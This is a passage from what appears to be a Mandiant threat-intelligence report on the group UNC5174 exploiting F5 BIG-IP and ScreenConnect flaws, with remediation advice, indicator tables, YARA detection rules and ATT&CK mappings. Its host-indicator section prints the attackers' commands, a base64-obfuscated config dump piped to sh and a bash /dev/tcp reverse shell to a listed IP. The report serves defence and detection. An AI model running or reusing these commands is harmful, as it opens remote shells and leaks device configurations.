<p>On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities. This activity was associated with the UNC5174 pseudonym "Uteus", which shared this purported access to a U.S. military contractor and UK government organization in an online communication. The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515. Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona indicated they had utilized a <a href="https://github.com/Chocapikk/CVE-2023-22515" rel="noopener" target="_blank"><u>public proof of concept</u></a> to perform activities on compromised systems. Notably, Uteus is believed to be distinct from the entity "Xiaoqiying," which has independently claimed to not be employed by the Chinese Government in a Telegram channel operated by the group.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig4.max-1000x1000.png" alt="Telegram channel for Xiaoqiying claiming no employment with the Chinese government">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.</p>
<h2>Outlook and Implications</h2>
<p>UNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale. These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to pose a threat to organizations in the academic, NGO, and government sectors specifically in the United States, Canada, Southeast Asia, Hong Kong, and the United Kingdom.</p>
<h2>Remediation and Hardening</h2>
<p>Mandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:</p>
<ul>
<li>Restrict access to the F5 TMUI from the internet.</li>
<li>Immediately apply the F5 mitigation script published in [<a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>K000137353</u></a>] to any vulnerable F5 appliances.</li>
<li>Investigate vulnerable F5 appliances for evidence of compromise.</li>
</ul>
<p>In the event of F5 compromise:</p>
<ul>
<li>Review appliance configurations for unauthorized modifications.</li>
<li>Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.</li>
<li>Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor.</li>
</ul>
<p>For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller <a href="https://services.google.com/fh/files/misc/connectwise-screenconnect-remediation-hardening-guide.pdf" rel="noopener" target="_blank"><u>read our latest ScreenConnect remediation and hardening guide</u></a>.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Network IOCs</h3></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>IP Address</strong></p>
</td>
<td>
<p><strong>ASN</strong></p>
</td>
<td>
<p><strong>NetBlock</strong></p>
</td>
<td>
<p><strong>Location</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>118.140.151[.]242 </span></p>
</td>
<td>
<p><span>9304</span></p>
</td>
<td>
<p><span>HGC Global Communications Limited</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>61.239.68[.]73 </span></p>
</td>
<td>
<p><span>9269</span></p>
</td>
<td>
<p><span>Hong Kong Broadband Network Ltd.</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>172.245.68[.]110</span></p>
</td>
<td>
<p><span>36352</span><a href="https://www.virustotal.com/gui/search/entity%253Aip%2520as_owner%253AAS-COLOCROSSING" rel="noopener" target="_blank"><span> </span></a></p>
</td>
<td>
<p><span>Colocrossing</span></p>
</td>
<td>
<p><span>(U.S.)</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>URLs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>URL</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>http://172.245.68[.]110:8888 </span></p>
</td>
<td>
<p><span>SUPERSHELL C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host IOCs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>MD5 Hash</span></strong></p>
</td>
<td>
<p><strong><span>Filename</span></strong></p>
</td>
<td>
<p><strong><span>Type</span></strong></p>
</td>
<td>
<p><strong><span>Code Family</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>c867881c56698f938b4e8edafe76a09b</span></p>
</td>
<td>
<p><span>LG</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>df4603548b10211f0aa77d0e9a172438</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0951109dd1be0d84a33d52c135ba9c97</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>9c3bf506dd19c08c0ed3af9c1708a770</span></p>
</td>
<td>
<p><span>memfd:a</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0ba435460fb7622344eec28063274b8a</span></p>
</td>
<td>
<p><span>undefined</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>a78bf3d16349eba86719539ee8ef562d</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host Based Indicators (Commands)</h3>
<pre class="language-plain"><code>cmd_data=run util bash -c "echo 
dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= 
| base64 -d | sh"  "tmsh -q -c 'cd /;show running-config recursive'"
run util bash -c "bash -i /dev/tcp/172.104.124.74/443 0&gt;&amp;1 &amp;"</code></pre></div>
<div class="block-paragraph_advanced"><h3>Detections</h3>
<pre class="language-plain"><code>rule M_Backdoor_GOREVERSE_2
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect events related 
to goreverse. GOREVERSE is a publicly available reverse shell"
                md5 = "5c175ea3664279d6c0c2609844de6949"
                platforms = "Windows,Linux,MacOS"
                malware_family = "GOREVERSE"
        strings:
                $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B 
[5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }
                $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 
8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }
                $cc_rssh = "rssh" fullword
                $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01 
[1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }
                $str1 = "--[foreground|fingerprint|proxy|process_name] 
-d|--destination &lt;server_address&gt;"
                $str2 = "-d or --destination Server connect back address 
(can be baked in)"
                $str3 = "--foreground Causes the client to run without 
forking to background"
                $str4 = "--fingerprint Server public key SHA256 hex 
fingerprint for auth"
                $str5 = "--proxy Location of HTTP connect proxy to use"
                $str6 = "--process_name Process name shown in 
tasklist/process list"
        condition:
                ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) 
or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) 
== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d 
and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) 
and (all of ($str*) or all of ($cc_*))
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Downloader_SNOWLIGHT_1 
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect 
the SNOWLIGHT code family"
                md5 = "0951109dd1be0d84a33d52c135ba9c97"
                platforms = "Linux"
                malware_family = "SNOWLIGHT"
        strings:
                $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 
7C F2 48 63 D2 48 89 EE 44 89 E7 }
                $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40 
00 BF 3F 01 00 00 E8 8C FE FF FF }	
        condition:
                uint32(0) == 0x464c457f and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><h2>Mandiant Security Validation Actions</h2>
<p>Organizations can validate their security controls using the following actions with <a href="https://cloud.google.com/security/products/threat-intelligence" rel="noopener" target="_blank"><u>Mandiant Security Validation</u></a>.</p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>VID</strong></p>
</td>
<td>
<p><strong>Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-917</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-916</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-059</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-056</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>MITRE ATT&amp;CK</h2>
<p>Mandiant has observed UNC5174 use the following techniques:</p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1140</span></p>
</td>
<td>
<p><span>Deobfuscate/Decode Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1222.002</span></p>
</td>
<td>
<p><span>Linux and Mac File and Directory Permissions Modification</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1601.001</span></p>
</td>
<td>
<p><span>Patch System Image</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1049</span></p>
</td>
<td>
<p><span>System Network Connections Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1105</span></p>
</td>
<td>
<p><span>Ingress Tool Transfer</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1572</span></p>
</td>
<td>
<p><span>Protocol Tunneling</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1573.002</span></p>
</td>
<td>
<p><span>Asymmetric Cryptography</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059</span></p>
</td>
<td>
<p><span>Command and Scripting Interpreter</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.004</span></p>
</td>
<td>
<p><span>Unix Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1136.001</span></p>
</td>
<td>
<p><span>Local Account</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1531</span></p>
</td>
<td>
<p><span>Account Access Removal</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003.008</span></p>
</td>
<td>
<p><span>/etc/passwd and /etc/shadow</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1608.003</span></p>
</td>
<td>
<p><span>Install Digital Certificate</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><br>Mandiant has observed UNC302 use the following techniques:<br><br></span></p>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1133</span></p>
</td>
<td>
<p><span>External Remote Services</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1189</span></p>
</td>
<td>
<p><span>Drive-by Compromise</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Collection</span></p>
</td>
<td>
<p><span>T1213</span></p>
</td>
<td>
<p><span>Data from Information Repositories</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560</span></p>
</td>
<td>
<p><span>Archive Collected Data</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560.001</span></p>
</td>
<td>
<p><span>Archive via Utility</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1505.003</span></p>
</td>
<td>
<p><span>Web Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1036</span></p>
</td>
<td>
<p><span>Masquerading</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1112</span></p>
</td>
<td>
<p><span>Modify Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1134</span></p>
</td>
<td>
<p><span>Access Token Manipulation</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1497</span></p>
</td>
<td>
<p><span>Virtualization/Sandbox Evasion</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1529</span></p>
</td>
<td>
<p><span>System Shutdown/Reboot</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059.003</span></p>
</td>
<td>
<p><span>Windows Command Shell</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.005</span></p>
</td>
<td>
<p><span>Visual Basic</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1203</span></p>
</td>
<td>
<p><span>Exploitation for Client Execution</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1012</span></p>
</td>
<td>
<p><span>Query Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1057</span></p>
</td>
<td>
<p><span>Process Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1518</span></p>
</td>
<td>
<p><span>Software Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003</span></p>
</td>
<td>
<p><span>OS Credential Dumping</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Lateral Movement</span></p>
</td>
<td>
<p><span>T1021.001</span></p>
</td>
<td>
<p><span>Remote Desktop Protocol</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1583.003</span></p>
</td>
<td>
<p><span>Virtual Private Server</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1584</span></p>
</td>
<td>
<p><span>Compromise Infrastructure</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1071.001</span></p>
</td>
<td>
<p><span>Web Protocols</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1071.004</span></p>
</td>
<td>
<p><span>DNS</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,33ms -->